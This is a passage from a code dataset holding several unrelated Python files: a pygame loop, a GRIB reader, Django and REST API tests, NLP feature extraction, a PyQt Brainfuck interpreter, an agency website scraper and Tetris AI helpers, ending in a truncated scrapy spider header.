running:\n\tclear_canvas()\n\tkpu_ground.draw(400,30)\n\tcharacter.clip_draw(frame * 100, 0, 100, 100, x, 90)\n\tupdate_canvas()\n\thandle_events()\n\tframe = (frame + 1) % 8\n\tx += dir * 5\n\tdelay(0.01)\n\n","sub_path":"수업내용/3주차_2.py","file_name":"3주차_2.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"229133324","text":"from eccodes import *\n#INPUT= \"AROME_010_SP1_06H_201702040000.grib2\"\n#INPUT= \"AROME_0.025_SP1_00H06H_201510131800.grib2\"\nINPUT= \"AROME_0.025_SP2_19H24H_201510131800.grib2\"\n#INPUT= \"cosmo-d2_germany_rotated-lat-lon_single-level_2018080818_006_T_2M.grib2\"\nwith GribFile(INPUT) as grib:\n messages=[]\n for i in range(len(grib)): # range(0,1)\n msg = GribMessage(grib)\n messages.append(msg)\n print (\" ************* Nombre de messages dans le fichier Grib : \",len(messages))\n print (messages[0].keys())\n n=1\n for msg in messages : \n print (n,msg[\"name\"],msg[\"level\"],msg[\"date\"],msg[\"hour\"],msg[\"forecastTime\"],msg[\"validityDate\"],msg[\"validityTime\"])\n n=n+1\n '''\n for k in msg.keys():\n print (k,\" : \",msg[k])\n '''","sub_path":".~c9_invoke_jkD4VC.py","file_name":".~c9_invoke_jkD4VC.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"452881463","text":"from __future__ import unicode_literals\n\nimport mock\n\nfrom tracpro.test import factories\nfrom tracpro.test.cases import TracProTest\n\nfrom .. import models\nfrom ..tasks import sync_questions_categories\n\n\nclass TestPollTask(TracProTest):\n\n @mock.patch.object(models.Poll, 'get_flow_definition')\n @mock.patch('tracpro.polls.tasks.logger.info')\n def test_sync_questions_categories(self, mock_logger, mock_poll_get_flow):\n self.org = factories.Org()\n self.poll_1 = factories.Poll(org=self.org, name='Poll 1')\n self.poll_2 = factories.Poll(org=self.org, name='Poll 2')\n # Create 2 questions locally:\n # one that is on RapidPro\n # and one that should be removed because it won't be on RapidPro\n self.question_1 = factories.Question(\n poll=self.poll_1, ruleset_uuid='goodquestion', question_type=models.Question.TYPE_MULTIPLE_CHOICE)\n self.question_2 = factories.Question(\n poll=self.poll_1, ruleset_uuid='oldquestion', question_type=models.Question.TYPE_MULTIPLE_CHOICE)\n\n # Data to pass to form for testing. Only select one poll\n self.data = [self.poll_1]\n # Patch the call to the API\n flow_1 = mock.Mock()\n flow_1.uuid = 'abcdefg123'\n flow_1.name = self.poll_1.name\n ruleset_existing = mock.Mock()\n ruleset_existing.uuid = 'goodquestion'\n ruleset_existing.label = 'good question'\n ruleset_new = mock.Mock()\n ruleset_new.uuid = 'newquestion'\n ruleset_new.label = 'new question'\n flow_1.rulesets = [ruleset_existing, ruleset_new]\n\n # Mock the call to the API to send back a single flow matching our first poll\n self.mock_temba_client.get_flows.return_value = [flow_1]\n # Mock this call to return an empty rule set so that RapidPro API is not called\n mock_poll_get_flow.return_value.rulesets = []\n\n # Assert that the 2 questions exist before we sync when one should be deleted\n self.assertEqual(models.Question.objects.count(), 2)\n\n # Call the task to sync questions...\n sync_questions_categories(self.org, self.data)\n # Two questions exist locally, one is new from the RapidPro API mock (flow_1.rulesets)\n self.assertEqual(models.Question.objects.count(), 2)\n self.assertEqual(models.Question.objects.first().ruleset_uuid, 'goodquestion')\n self.assertEqual(models.Question.objects.last().ruleset_uuid, 'newquestion')\n # Only 1 poll was reflected in the log message as only 1 poll was sent into the form data\n self.assertEqual(mock_logger.call_count, 2)\n self.assertIn(\"1 Poll(s)\", mock_logger.call_args[0][0])\n","sub_path":"tracpro/polls/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535056541","text":"import taps\n\n\ndef read_word_file(file):\n \"\"\"\n Reads a file full of words (one word per line) and puts them into a list. Any lines that begin with a '#'\n character are ignored.\n\n :rtype: List of words read in from the file.\n \"\"\"\n words = []\n with open(file, 'r') as wordfile:\n w = wordfile.readlines()\n\n for word in w:\n word = word.strip()\n if not word.startswith(\"#\") and len(word) > 0:\n words.append(word.lower())\n\n return words\n\n\ndef sort_file(infile, outfile=None):\n \"\"\"\n Reads in a file line by line, and sorts the lines alphabetically.\n\n :param infile - the name of the file that has lines to be sorted.\n :param outfile - the name of the file to write the data to, if no file is provided writes to the same\n file name as inflie.\n\n :return: None - but does write out the sorted file\n \"\"\"\n words = read_word_file(infile)\n words.sort()\n\n out = infile\n if outfile is not None:\n out = outfile\n\n with open(out, 'w') as writefile:\n for word in words:\n writefile.write(word)\n writefile.write(\"\\n\")\n\n# Basic Test Data\nsentence = 'Throw Dirty rock at that mangey old goblin'\nprint(\"testing input sentence:\", sentence)\n\n# Init the Game Dictionary\nadjectives = ['dirty', 'shiny']\ncommands = ['quit']\nnouns = ['goblin', 'rock']\nprepositions = ['above', 'at', 'with']\nverbs = ['throw', 'attack', 'look']\ngame_dictionary = taps.GameDictionary(adjectives, commands, nouns, prepositions, verbs)\n\n# Create Parser\nip = taps.InputParser(game_dictionary)\n\n# Parse Sentence.\nip.parse_input(sentence)","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"171834193","text":"# Copyright 2014 - Savoir-Faire Linux inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport json\n\nfrom surveil.api.datamodel.config import service\nfrom surveil.tests.api import functionalTest\n\n\nclass TestServiceController(functionalTest.FunctionalTest):\n\n def setUp(self):\n super(TestServiceController, self).setUp()\n self.services = [\n {\n \"host_name\": \"sample-server1\",\n \"service_description\": \"check-\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n },\n {\n \"host_name\": \"sample-server2\",\n \"service_description\": \"check-disk-sdb\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n },\n {\n \"host_name\": \"sample-server3\",\n \"service_description\": \"check-disk-sdb\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n },\n ]\n self.mongoconnection.shinken.services.insert(\n copy.deepcopy(self.services)\n )\n\n def test_get_all_services(self):\n response = self.get('/v2/config/services')\n\n self.assert_count_equal_backport(\n json.loads(response.body.decode()),\n self.services\n )\n self.assertEqual(response.status_int, 200)\n\n def test_get_all_services_no_templates(self):\n self.mongoconnection.shinken.services.insert(\n copy.deepcopy(\n {\"host_name\": \"sample-server3\",\n \"service_description\": \"check-disk-sdb\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"register\": \"0\",\n \"contact_groups\": \"linux-admins\"}\n )\n )\n response = self.get('/v2/config/services')\n\n self.assert_count_equal_backport(\n json.loads(response.body.decode()),\n self.services\n )\n self.assertEqual(response.status_int, 200)\n\n def test_add_service(self):\n new_service = {\n \"host_name\": \"SOMEHOSTNAME\",\n \"service_description\": \"check-new-thing\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n }\n response = self.post_json(\n \"/v2/config/services\",\n params=new_service\n )\n\n services = [service.Service(**s).as_dict() for s in\n self.mongoconnection.shinken.services.find()]\n\n self.assertTrue(new_service in services)\n self.assertEqual(response.status_int, 201)\n","sub_path":"surveil/tests/api/controllers/v2/config/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"101155509","text":"import pytest\nimport mysql_proc as mysql_proc\nimport datetime\n\n\n\n#------------------------------------------------------------------------------\n#-\n#- Test Tools\n#-\n#------------------------------------------------------------------------------\n\n\nclass TestBattleResult(mysql_proc.BattleResult):\n name = \"testname\"\n choice_id = 1\n result = \"win\"\n\n#------------------------------------------------------------------------------\n#-\n#- Test Function\n#-\n#------------------------------------------------------------------------------\n\ndef test_getEngineKey():\n\n get_key = mysql_proc.getEngineKey(\"testuser\",\"testpass\",\"testhost\",\"testdb\")\n assert \"mysql://testuser:testpass@testhost/testdb\" == get_key\n\ndef test_getEngineRps():\n get_engine = mysql_proc.getEngineRps()\n\n assert \"mysql\" == get_engine.name\n assert \"mysqldb\" == get_engine.driver\n assert True == get_engine.has_table(\"battle_history\")\n\n\ndef test_rps_engine():\n get_engine = mysql_proc.rps_engine\n\n assert \"mysql\" == get_engine.name\n assert \"mysqldb\" == get_engine.driver\n assert True == get_engine.has_table(\"battle_history\")\n\ndef test_getSession():\n engine = mysql_proc.rps_engine\n session = mysql_proc.getSession(engine)\n assert True == session.is_active\n \ndef test_ClassBattleResult():\n br = mysql_proc.BattleResult()\n nowdate = datetime.datetime.now()\n assert (nowdate - br.time_now ).total_seconds() <= 1\n\n assert br.name == \"NA\"\n assert br.choice_id == 0\n assert br.result == \"\"\n\n br.name = \"testname\"\n br.choice_id = 1\n br.result = \"testresult\"\n\n assert br.name == \"testname\"\n assert br.choice_id == 1\n assert br.result == \"testresult\"\n\ndef test_rpsInsert(\n all_delete_battle_history\n ):\n\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n\n engine = mysql_proc.rps_engine\n session = mysql_proc.getSession(engine)\n query_result = session.query(mysql_proc.BattleHistory).all()\n session.close()\n\n nowdate = datetime.datetime.now()\n assert (nowdate - query_result[0].time ).total_seconds() <= 10\n assert query_result[0].name == \"testname\"\n assert query_result[0].choice_id == 1\n assert query_result[0].result == \"win\"\n\n@pytest.mark.parametrize(\n \"dictarg, expectresult1, expectresult2\", [\n ({\"None\":\"None\"}, 2,3),\n ({\"result\":\"win\"}, 2,2)\n])\ndef test_rpsCount(\n all_delete_battle_history,\n dictarg, expectresult1, expectresult2\n ):\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n mysql_proc.rpsInsert(br)\n\n count_total = mysql_proc.rpsCount(**dictarg)\n assert count_total == expectresult1\n\n br.result = \"loose\"\n mysql_proc.rpsInsert(br)\n count_total = mysql_proc.rpsCount(**dictarg)\n assert count_total == expectresult2\n\n\n#- test for Proc function -------------------------------------------\n\ndef test_rpsGetBattleCountAll(\n all_delete_battle_history\n ):\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n mysql_proc.rpsInsert(br)\n assert mysql_proc.rpsGetBattleCountAll() == 2\n\n mysql_proc.rpsInsert(br)\n assert mysql_proc.rpsGetBattleCountAll() == 3\n \ndef test_rpsGetBattleCountForResult(\n all_delete_battle_history\n ):\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n mysql_proc.rpsInsert(br)\n br.result = \"loose\"\n mysql_proc.rpsInsert(br)\n assert mysql_proc.rpsGetBattleCountForResult(\"win\") == 2\n assert mysql_proc.rpsGetBattleCountForResult(\"loose\") == 1\n\ndef test_recordedBattleResult(\n all_delete_battle_history\n ):\n\n mysql_proc.recordedBattleResult(\"testname\",1,\"win\")\n\n engine = mysql_proc.rps_engine\n session = mysql_proc.getSession(engine)\n query_result = session.query(mysql_proc.BattleHistory).all()\n session.close()\n\n nowdate = datetime.datetime.now()\n assert (nowdate - query_result[0].time ).total_seconds() <= 10\n assert query_result[0].name == \"testname\"\n assert query_result[0].choice_id == 1\n assert query_result[0].result == \"win\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"docker/__001_01_flask_image_std/setup/test_mysql_proc.py","file_name":"test_mysql_proc.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106899097","text":"from scipy.sparse import *\nimport pandas as pd\nimport spacy\nimport time\nimport os\nimport io\n\n\n# import NLP library\nnlp = spacy.load('en_core_web_lg')\n\n# set working path\nhome_dir = os.path.expanduser(\"~\")\nos.chdir(home_dir + '/OneDrive/Academy/the U/Assignment/AssignmentSln/ML-03-final-movie')\n\n# import given features ----\ndef import_given_feature():\n voc_n = 74481 # vocabulary size\n train_data = []\n with io.open('data/data-splits/data.train', encoding = 'utf8') as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n line = line.strip().split()\n label = int(line.pop(0))\n label = -1 if label == 0 else 1\n feature_dict = dict([(int(i.split(':')[0]), float(i.split(':')[1])) for i in line])\n # convert feature to sparse vector\n feature = lil_matrix((1, voc_n))\n for k, v in feature_dict.items():\n feature[0, k-1] = v\n feature = feature.tocsr()\n line = {'id': i, 'label': label, 'vector': feature}\n train_data.append(line)\n train_data = pd.DataFrame(train_data)\n # save \n train_data['label'].to_pickle('label_train.pkl')\n train_data.to_pickle('train_data.pkl')\n\n test_data = []\n with io.open('data/data-splits/data.test', encoding = 'utf8') as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n line = line.strip().split()\n label = int(line.pop(0))\n label = -1 if label == 0 else 1\n feature_dict = dict([(int(i.split(':')[0]), float(i.split(':')[1])) for i in line])\n # convert feature to sparse vector\n feature = lil_matrix((1, voc_n))\n for k, v in feature_dict.items():\n feature[0, k-1] = v\n feature = feature.tocsr()\n line = {'id': i, 'label': label, 'vector': feature}\n test_data.append(line)\n test_data = pd.DataFrame(test_data)\n # save \n test_data['label'].to_pickle('label_test.pkl')\n test_data.to_pickle('test_data.pkl')\n\n eval_data = []\n with io.open('data/data-splits/data.eval.anon', encoding = 'utf8') as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n line = line.strip().split()\n label = int(line.pop(0))\n label = -1 if label == 0 else 1\n feature_dict = dict([(int(i.split(':')[0]), float(i.split(':')[1])) for i in line])\n # convert feature to sparse vector\n feature = lil_matrix((1, voc_n))\n for k, v in feature_dict.items():\n feature[0, k-1] = v\n feature = feature.tocsr()\n line = {'id': i, 'label': label, 'vector': feature}\n eval_data.append(line)\n eval_data = pd.DataFrame(eval_data)\n with io.open('data/data-splits/data.eval.anon.id', encoding = 'utf8') as f:\n eval_data_id = [f.strip() for f in f.readlines()]\n eval_data['example_id'] = eval_data_id\n # save \n eval_data['example_id'].to_pickle('eval_id.pkl')\n eval_data.to_pickle('eval_data.pkl')\n\n\n# generate my feature ----\ndef make_my_feature():\n # training set ----\n start_time = time.time()\n with io.open('data/raw-data/train.rawtext', encoding = 'utf8') as f:\n train_data = {'id':[], 'text':[]}\n lines = f.readlines()\n for i, line in enumerate(lines):\n train_data['id'].append(i)\n train_data['text'].append(nlp(line))\n train_data = pd.DataFrame(train_data)\n print(\"--- %s mimutes ---\" % (time.time() - start_time) / 60)\n # add label\n label = pd.read_pickle('label_train.pkl')\n train_data['label'] = label\n # generate sentence embedding\n train_data['vector'] = train_data['text'].apply(lambda r: csr_matrix(r.vector))\n\n # save to external file\n train_data2_sm = train_data[['id', 'label', 'vector']]\n train_data2_sm.to_pickle('train_data2_sm.pkl')\n\n # test set ----\n start_time = time.time()\n with io.open('data/raw-data/test.rawtext', encoding = 'utf8') as f:\n test_data = {'id':[], 'text':[]}\n lines = f.readlines()\n for i, line in enumerate(lines):\n test_data['id'].append(i)\n test_data['text'].append(nlp(line))\n test_data = pd.DataFrame(test_data)\n print(\"--- %s mimutes ---\" % ((time.time() - start_time) / 60))\n # add label\n label = pd.read_pickle('label_test.pkl')\n test_data['label'] = label\n # generate sentence embedding\n test_data['vector'] = test_data['text'].apply(lambda r: csr_matrix(r.vector))\n # save to external file\n test_data2_sm = test_data[['id', 'label', 'vector']]\n test_data2_sm.to_pickle('test_data2_sm.pkl')\n\n # eval set ----\n start_time = time.time()\n with io.open('data/raw-data/eval.rawtext', encoding = 'utf8') as f:\n eval_data = {'id':[], 'text':[]}\n lines = f.readlines()\n for i, line in enumerate(lines):\n eval_data['id'].append(i)\n eval_data['text'].append(nlp(line))\n eval_data = pd.DataFrame(eval_data)\n print(\"--- %s mimutes ---\" % ((time.time() - start_time) / 60))\n # add label\n eval_data['label'] = 1\n # add example_id\n eval_data['example_id'] = pd.read_pickle('id_eval.pkl')\n # generate sentence embedding\n eval_data['vector'] = eval_data['text'].apply(lambda r: csr_matrix(r.vector))\n # save to external file\n eval_data2_sm = eval_data[['id', 'example_id', 'label', 'vector']]\n eval_data2_sm.to_pickle('eval_data2_sm.pkl')\n\n","sub_path":"ML-03-final-movie/deprecated scripts/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3286910","text":"import sys\n\nfrom PyQt5 import QtWidgets, uic, QtCore\n\nfrom BFI import programRunner\n\nbfi = programRunner(consoleOutput=True, memoryRollover=False)\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__()\n uic.loadUi('v1.ui', self)\n self.show()\n self.findChild(QtWidgets.QPushButton, 'run').clicked.connect(self.runButtonClicked)\n self.findChild(QtWidgets.QPushButton, 'step').clicked.connect(self.stepButtonClicked)\n self.findChild(QtWidgets.QPushButton, 'stop').clicked.connect(self.stopButtonClicked)\n self.findChild(QtWidgets.QSpinBox, 'delay').valueChanged.connect(self.updateDelay)\n\n self.runButton = self.findChild(QtWidgets.QPushButton, 'run')\n self.stepButton = self.findChild(QtWidgets.QPushButton, 'step')\n self.stopButton = self.findChild(QtWidgets.QPushButton, 'stop')\n\n self.runButton.clicked.connect(self.runButtonClicked)\n self.stepButton.clicked.connect(self.stepButtonClicked)\n\n self.running = False\n self.programActive = False\n\n self.timer = QtCore.QTimer()\n self.timer.setInterval(10)\n self.timer.timeout.connect(self.uiUpdate)\n self.timer.start()\n\n def runButtonClicked(self):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Pause\")\n self.runButton.clicked.connect(self.pauseButtonClicked)\n\n self.running = True\n self.stopButton.setEnabled(True)\n\n if not self.programActive:\n bfi.cleanup()\n bfi.setProgram(self.findChild(QtWidgets.QPlainTextEdit, 'program').toPlainText())\n self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n\n def pauseButtonClicked(self):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Continue\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.running = True\n self.programActive = True\n\n def stepButtonClicked(self):\n\n if not self.programActive:\n bfi.cleanup()\n bfi.setProgram(self.findChild(QtWidgets.QPlainTextEdit, 'program').toPlainText())\n self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n self.stopButton.setEnabled(True)\n self.programActive(True)\n\n self.running = False\n\n if bfi.programPointer < len(bfi.program):\n bfi.step()\n if bfi.consoleOutput:\n print(bfi.consoleContent)\n else:\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Run\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.stopButton.setEnabled(False)\n self.running = False\n self.programActive = False\n\n def stopButtonClicked(self):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Run\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.running = False\n self.programActive = False\n bfi.needInput = False\n self.stopButton.setEnabled(False)\n self.stepButton.setEnabled(True)\n self.runButton.setEnabled(True)\n self.findChild(QtWidgets.QLineEdit, 'input').setEnabled(False)\n # self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n\n def uiUpdate(self):\n if bfi.needInput:\n bfi.memory[bfi.memoryPointer] = self.handleInput()\n if self.running:\n if not bfi.programPointer < len(bfi.program):\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Run\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.stopButton.setEnabled(False)\n self.running = False\n self.programActive = False\n\n else:\n bfi.step()\n\n self.findChild(QtWidgets.QPlainTextEdit, 'memory').setPlainText(str(bfi.memory))\n self.findChild(QtWidgets.QLabel, 'output').setText(bfi.output)\n if bfi.consoleOutput:\n print(bfi.consoleContent)\n\n def updateDelay(self):\n self.timer.setInterval(self.findChild(QtWidgets.QSpinBox, 'delay').value())\n\n def handleInput(self):\n\n self.runButton.clicked.disconnect()\n self.runButton.setText(\"Continue\")\n self.runButton.clicked.connect(self.runButtonClicked)\n\n self.stepButton.setEnabled(False)\n self.runButton.setEnabled(False)\n self.findChild(QtWidgets.QLineEdit, 'input').setEnabled(True)\n while True:\n try:\n value = ord(self.findChild(QtWidgets.QLineEdit, 'input').text())\n except:\n pass\n else:\n self.findChild(QtWidgets.QLineEdit, 'input').setText(\"\")\n self.findChild(QtWidgets.QLineEdit, 'input').setEnabled(False)\n self.stepButton.setEnabled(True)\n self.runButton.setEnabled(True)\n bfi.needInput = False\n break\n app.processEvents()\n return value\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_()\n#input(\"press enter to exit\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"192669490","text":"import requests, os, json\nfrom scrape_social_info import ScrapeSocialInfo\n# from lighthouse import get_lighthouse_results\nfrom agency_dataaccessor import AgencyDataAccessor\n\n\nclass ProcessAgencyInfo:\n\n def __init__(self, agency):\n self.agency_firms = []\n self.agency = agency\n self.website = agency['website']\n self.buckets = [\"security_and_privacy\",\"outreach_and_communication\",\"website_accessibility\"]\n\n def process_agency_info(self):\n try:\n agency_url = self.agency.get('website',None)\n if agency_url is None or agency_url == '':\n print(f\"Website url is not available for {self.agency['id']}, name: {self.agency['name']}\")\n return\n print(f\"Scraping the website {agency_url}\")\n page = requests.get(agency_url, timeout=30)\n scrape_social_info = ScrapeSocialInfo(page, self.website)\n social_media_info, contact_info = scrape_social_info.scrape_info()\n profile_info = {}\n for bucket in self.buckets:\n if bucket == \"security_and_privacy\":\n profile_info[bucket] = self.get_security_privacy_info(self.website)\n elif bucket == \"outreach_and_communication\":\n profile_info[bucket] = self.get_outreach_communication_info(social_media_info, contact_info)\n elif bucket == \"website_accessibility\":\n # profile_info[bucket] = self.get_website_accessibility_info(self.website)\n profile_info[bucket] = {}\n\n agency_details = {\n \"id\": self.agency['id'],\n \"name\": self.agency['name'],\n \"Website\": self.website,\n \"profile\": profile_info\n }\n \n data_accessor = AgencyDataAccessor(None, self.agency)\n data_accessor.update_scrape_info(agency_details)\n return agency_details\n except Exception as ex:\n print(f\"An error occurred while processing the agency information: {str(ex)}\")\n \n\n \n def get_security_privacy_info(self, url):\n return {\n \"https\": self.get_http_acess(url),\n \"privacy_policies\": self.get_random_value(\"comprehensive\")\n }\n\n def get_website_accessibility_info(self,url):\n return {\n \"mobile_friendly\": self.get_random_value(\"test\"),\n \"page_speed\": self.get_random_value(\"page_speed\"),\n \"performance\": self.get_site_performance(url),\n \"multi_lingual\": self.get_random_value(\"multi_lingual\")\n }\n \n def get_outreach_communication_info(self, social_media_info, contact_info):\n agency_info = {\n \"social_media_access\": self.get_socialmedia_access(social_media_info),\n \"contact_access\": self.get_contact_access(contact_info)\n }\n return agency_info\n\n def get_contact_access(self, contact_info):\n is_contact_info_available = False\n if contact_info and contact_info[\"phone_number\"] or contact_info[\"email\"] or contact_info[\"address\"]:\n is_contact_info_available = True\n else:\n is_contact_info_available = False\n return self.get_criteria_object(contact_info, is_contact_info_available)\n \n def get_socialmedia_access(self, social_media_info):\n is_criteria_met = True if social_media_info and len(social_media_info) > 0 else False\n return self.get_criteria_object(social_media_info, is_criteria_met)\n \n def get_http_acess(self, url):\n return self.get_criteria_object(None, \"https\" in url)\n\n def get_random_value(self, url):\n return self.get_criteria_object(None, True)\n\n def get_site_performance(self, url):\n print(\"hello world\")\n # response = get_lighthouse_results(url,'performance')\n # score = response['lighthouseResult']['categories']['performance']['score']\n # is_criteria_met = True if score >= 80 else False\n # return self.get_criteria_object(score, is_criteria_met)\n\n def get_criteria_object(self, criteria, is_met):\n return {\n \"met_criteria\" : is_met,\n \"info\": criteria\n }\n\n\n# agency_info = ProcessAgencyInfo()\n# agency_info.process_agency_info()\n","sub_path":"scrapers/process_agency_info.py","file_name":"process_agency_info.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236210068","text":"import random\nfrom copy import deepcopy\nfrom TetrisSettings import *\n\n\n###########################\n# Board Helper Algorithms #\n###########################\ndef check_collision(board, tile_shape, offsets):\n for cy, row in enumerate(tile_shape):\n for cx, val in enumerate(row):\n if val == 0:\n continue\n try:\n if board[cy + offsets[1]][cx + offsets[0]]:\n return True\n except IndexError:\n return True\n return False\n\n\ndef get_effective_height(board, tile, offsets):\n offset_x, offset_y = offsets\n while not check_collision(board, tile, (offset_x, offset_y)):\n offset_y += 1\n return offset_y - 1\n\n\ndef get_board_with_tile(board, tile, offsets, flattened=False):\n # Make a copy\n board = deepcopy(board)\n # If flatten, change all numbers to 0/1\n if flattened:\n board = [[int(bool(val)) for val in row] for row in board]\n # Add current tile (do not flatten)\n for y, row in enumerate(tile):\n for x, val in enumerate(row):\n if val != 0:\n board[y + offsets[1]][x + offsets[0]] = val\n return board\n\n\ndef get_future_board_with_tile(board, tile, offsets, flattened=False):\n return get_board_with_tile(board, tile, (offsets[0], get_effective_height(board, tile, offsets)), flattened)\n\n\n################\n# Misc Helpers #\n################\ndef print_board(board):\n print(\"Printing debug board\")\n for i, row in enumerate(board):\n print(\"{:02d}\".format(i), row)\n\n\ndef get_rotated_tile(tile):\n return list(zip(*reversed(tile)))\n\n\ndef get_color_tuple(color_hex):\n if color_hex is None:\n color_hex = \"11c5bf\"\n color_hex = color_hex.replace(\"#\", \"\")\n return tuple(int(color_hex[i:i + 2], 16) for i in (0, 2, 4))\n\n\n######################\n# Fitness Algorithms #\n######################\n# Reference to https://codemyroad.wordpress.com/2013/04/14/tetris-ai-the-near-perfect-player/\ndef get_fitness_score(board):\n board, score_count = get_board_and_lines_cleared(board)\n score = WEIGHT_LINE_CLEARED * score_count\n score += WEIGHT_AGGREGATE_HEIGHT * sum(get_col_heights(board))\n score += WEIGHT_HOLES * get_hole_count(board)\n score += WEIGHT_BUMPINESS * get_bumpiness(board)\n return score\n\n\n# Get height of each column\ndef get_col_heights(board):\n heights = [0] * GRID_COL_COUNT\n cols = list(range(GRID_COL_COUNT))\n for neg_height, row in enumerate(board):\n for i, val in enumerate(row):\n if val == 0 or i not in cols:\n continue\n heights[i] = GRID_ROW_COUNT - neg_height\n cols.remove(i)\n return heights\n\n\n# Count of empty spaces below covers\ndef get_hole_count(board):\n holes = 0\n cols = [0] * GRID_COL_COUNT\n for neg_height, row in enumerate(board):\n height = GRID_ROW_COUNT - neg_height\n for i, val in enumerate(row):\n if val == 0 and cols[i] > height:\n holes += 1\n continue\n if val != 0 and cols[i] == 0:\n cols[i] = height\n return holes\n\n\n# Get the unevenness of the board\ndef get_bumpiness(board):\n bumpiness = 0\n heights = get_col_heights(board)\n for i in range(1, GRID_COL_COUNT):\n bumpiness += abs(heights[i - 1] - heights[i])\n return bumpiness\n\n\n# Get potential lines cleared\n# WARNING: MODIFIES BOARD!!!\ndef get_board_and_lines_cleared(board):\n score_count = 0\n row = 0\n while True:\n if row >= len(board):\n break\n if 0 in board[row]:\n row += 1\n continue\n # Delete the \"filled\" row\n del board[row]\n # Insert empty row at top\n board.insert(0, [0] * GRID_COL_COUNT)\n score_count += 1\n return board, score_count\n\n\ndef random_weight():\n return random.uniform(-1, 1)\n","sub_path":"TetrisUtils.py","file_name":"TetrisUtils.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"328616174","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a GreenHouseJobs spider created on top of the SimpleList\nscrapy crawl greenhouse_jobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://boards.greenhouse.io/enernoc?t=sjkdn4#.VrUv1pMrLPB\"\n\nsample url:\n https://boards.greenhouse.io/enernoc?t=sjkdn4#.VrUv1pMrLPB\n\"\"\"\n\nfrom urlparse import urljoin\nfrom 